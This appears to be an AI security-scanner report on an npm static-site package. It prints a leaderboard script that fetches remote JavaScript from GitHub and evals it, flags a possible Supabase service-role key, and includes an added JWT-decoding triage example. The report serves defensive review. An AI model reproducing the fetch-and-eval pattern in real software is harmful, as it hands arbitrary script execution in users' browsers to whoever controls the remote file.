
grapes-andrewdingus@1.0.32

GRAPES OS static site — CDN-ready via unpkg

AI Security Review

scanned 6h ago · by lpm-firewall-ai

The package ships a static site page that executes mutable remote JavaScript from GitHub at runtime. No install-time behavior was found, but visiting the leaderboard page gives the remote scores file arbitrary script execution in the page context.

Static reason
High-risk behavior combination matched malicious policy; source matched a previously finalized malicious package (routed for review); source fingerprint signature matched a known malicious package (routed for review).
Trigger
Browser visit to leaderboard.html
Impact
Remote maintainer or compromised GitHub content can execute arbitrary browser-side code in the package site context.
Mechanism
fetch remote JavaScript and eval it
Attack narrative
When leaderboard.html is opened, it loads assets/js/leaderboard.js. That script fetches a mutable scores.js file from raw.githubusercontent.com and passes the response directly to eval, allowing the remote file to execute arbitrary JavaScript in visitors' browsers under the static site's context.
Rationale
Direct source inspection confirms runtime remote-code execution via fetch plus eval from a mutable GitHub URL. The behavior is not install-time malware, but it is a concrete unpinned remote execution backdoor surface in an npm-distributed static site.
Evidence
  • package.json
  • leaderboard.html
  • assets/js/leaderboard.js
  • assets/js/app_functions.js
  • prepare-unpkg.ps1
Network endpoints (2)
  • raw.githubusercontent.com/grapes-os/grapes-os-leaderboard/main/scores.js
  • hqlgppguxhqeaonjzinv.supabase.co

Decision evidence

public snapshot
AI called this Malicious at 94.0% confidence as Dangerous Capability with low false-positive risk.
Evidence for block
  • assets/js/leaderboard.js fetches https://raw.githubusercontent.com/grapes-os/grapes-os-leaderboard/main/scores.js
  • assets/js/leaderboard.js immediately evals fetched remote text in main()
  • leaderboard.html loads assets/js/leaderboard.js with defer, activating on page visit
  • Remote code runs in browser origin and can access DOM/storage for the static site
Evidence against
  • package.json has no npm lifecycle scripts or bin entrypoints
  • No install-time filesystem writes or AI-agent control-surface mutation found
  • assets/js/app_functions.js Supabase key is an anon browser key used for app listing RPC
  • prepare-unpkg.ps1 is a publish helper copying CSS only
Behavioral surface
  • Source: Eval, Network
  • Supply chain: HighEntropyStrings, UrlStrings
  • Manifest: no manifest risk signals triggered.
scanned 9 file(s), 41.9 KB of source

Source & flagged code

10 flagged
assets/js/app_functions.js
patternName = supabase_service_key; severity = critical; line = 3; matchedText = "eyJhbGc...w8"
Critical
Critical Secret

Package contains a critical-looking secret pattern.

assets/js/app_functions.js, line 3
patternName = supabase_service_key; severity = critical; line = 3; matchedText = "eyJhbGc...w8"
Critical
Secret Pattern

Pattern match reported as a Supabase service role key (JWT) in assets/js/app_functions.js. Note that the decision evidence above assesses the same value as an anon browser key; the pattern name is assigned by string shape alone, and the "eyJhbGc" prefix is shared by every HS256 JWT, so decode the token's role claim before closing this finding either way. An anon key in a browser bundle is expected and is only as safe as the project's row-level security policies; a service_role key bypasses those policies and must never ship client-side.

assets/js/app_functions.js, line 3
assets/js/leaderboard.js
    36  async function getScores() {
    37    let response = await fetch(
    38      "https://raw.githubusercontent.com/grapes-os/grapes-os-leaderboard/main/scores.js",
    39    );
    40    return await response.text(); // is promise for whatever reason
    41  }
        ...
    45    let js_code = await getScores();
    46    eval(js_code); // never use eval
    47  } catch (e) {
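The two findings above and the "anon browser key" line under Evidence against disagree about the same secret. What separates the two Supabase key kinds is the role claim inside the JWT, so the check is to decode it. The following is an added example (not the package's code and not the scanner's): sample tokens are constructed with a fake project ref and a dummy signature, and the package's real key is not reproduced. The host comparison assumes the Supabase convention that the ref claim equals the project subdomain of <ref>.supabase.co.

```javascript
// Added example: classify a Supabase key by its JWT role claim.
// Sample tokens below are constructed (fake ref, placeholder signature).
function b64urlDecode(s) {
  return Buffer.from(s, "base64url").toString("utf8");
}
function b64urlEncode(obj) {
  return Buffer.from(JSON.stringify(obj), "utf8").toString("base64url");
}

// Parse without verifying the signature: we do not hold the project's JWT
// secret, and for triage the claims are what distinguish the two key kinds.
function decodeJwtUnverified(token) {
  const parts = token.split(".");
  if (parts.length !== 3) throw new Error("not a compact JWT");
  return {
    header: JSON.parse(b64urlDecode(parts[0])),
    payload: JSON.parse(b64urlDecode(parts[1])),
  };
}

// Supabase issues both keys as HS256 JWTs with iss "supabase", a ref equal
// to the project subdomain, and role "anon" or "service_role".
function classifySupabaseKey(token, expectedHost) {
  let payload;
  try {
    payload = decodeJwtUnverified(token).payload;
  } catch {
    return { kind: "not_a_jwt" };
  }
  if (payload.iss !== "supabase") return { kind: "not_supabase" };
  const refMatches = expectedHost
    ? expectedHost === `${payload.ref}.supabase.co`
    : null;
  const kind =
    payload.role === "service_role" ? "service_role"
    : payload.role === "anon" ? "anon"
    : "unknown_role";
  return { kind, ref: payload.ref, refMatches };
}

// Constructed sample key; the ref and signature are placeholders.
function makeSampleKey(role, ref = "abcdefghijklmnopqrst") {
  const header = b64urlEncode({ alg: "HS256", typ: "JWT" });
  const payload = b64urlEncode({ iss: "supabase", ref, role, iat: 1700000000, exp: 2000000000 });
  const fakeSignature = "x".repeat(43); // not a valid HMAC, only the shape
  return `${header}.${payload}.${fakeSignature}`;
}
```

Run it against the literal string from assets/js/app_functions.js together with the supabase.co host listed under Network endpoints: a kind of anon with refMatches true supports the "anon browser key" reading; service_role means the secret pattern finding stands and the key should be rotated.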
Critical
Remote Asset Decode Execute

Rule description: source fetches a remote non-code asset, decodes its contents, and dynamically executes the decoded payload. In this package there is no decoding step at all: the response body of scores.js is handed to eval as-is, which is the more direct form of the same behavior.

assets/js/leaderboard.js, line 36
    45    let js_code = await getScores();
    46    eval(js_code); // never use eval
    47  } catch (e) {
High
Eval

Package source references dynamic code evaluation.

assets/js/leaderboard.js, line 45
  matchType = normalized_sha256
  matchedPackage = grapes-andrewdingus@1.0.30
  matchedPath = assets/js/leaderboard.js
  matchedIdentity = npm:Z3JhcGVzLWFuZHJld2Rpbmd1cw:1.0.30
  similarity = 1.000
  summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

assets/js/leaderboard.js
  matchType = malicious_source_fingerprint_signature
  signature = 26a6083a366a497c
  signatureType = suspicious_hashes
  sourceLabel = final_verdict:malicious
  matchedPackage = grapes-andrewdingus@1.0.30
  matchedPath = assets/js/leaderboard.js
  matchedIdentity = npm:Z3JhcGVzLWFuZHJld2Rpbmd1cw:1.0.30
  similarity = 1.000
  shingleOverlap = 5
  summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

assets/js/leaderboard.js
prepare-unpkg.ps1
  path = prepare-unpkg.ps1
  kind = build_helper
  sizeBytes = 468
  magicHex = [redacted]
Medium
Ships Build Helper

Package ships non-JavaScript build or shell helper files.

prepare-unpkg.ps1
grapes-andrewdingus-1.0.31.tgz
  path = grapes-andrewdingus-1.0.31.tgz
  kind = high_entropy_blob
  sizeBytes = 16415023
  magicHex = [redacted]
High
Ships High Entropy Blob

Package ships high-entropy non-source blobs.

grapes-andrewdingus-1.0.31.tgz
  path = grapes-andrewdingus-1.0.31.tgz
  kind = compressed_blob
  sizeBytes = 16415023
  magicHex = [redacted]
Medium
Ships Compressed Blob

Package ships compressed or archive-like blobs.

grapes-andrewdingus-1.0.31.tgz
  path = grapes-andrewdingus-1.0.31.tgz
  kind = nested_archive_needs_inspection
  sizeBytes = 16415023
  magicHex = [redacted]
Low
Nested Archive Needs Inspection

Package ships a nested archive or MCP bundle that was inventoried but not recursively analyzed. The filename suggests a packed copy of the prior release (1.0.31), and its roughly 16 MB of contents are outside the 9 scanned files, so extract and scan it before treating the file count above as complete.

grapes-andrewdingus-1.0.31.tgz

Findings

3 Critical · 4 High · 4 Medium · 3 Low
  • Critical: Critical Secret (assets/js/app_functions.js)
  • Critical: Remote Asset Decode Execute (assets/js/leaderboard.js)
  • Critical: Secret Pattern (assets/js/app_functions.js)
  • High: Eval (assets/js/leaderboard.js)
  • High: Ships High Entropy Blob (grapes-andrewdingus-1.0.31.tgz)
  • High: Known Malware Source Similarity (assets/js/leaderboard.js)
  • High: Known Malware Source Fingerprint Signature (assets/js/leaderboard.js)
  • Medium: Network
  • Medium: Ships Build Helper (prepare-unpkg.ps1)
  • Medium: Ships Compressed Blob (grapes-andrewdingus-1.0.31.tgz)
  • Medium: Structural Risk Force Deep Review
  • Low: High Entropy Strings
  • Low: Url Strings
  • Low: Nested Archive Needs Inspection (grapes-andrewdingus-1.0.31.tgz)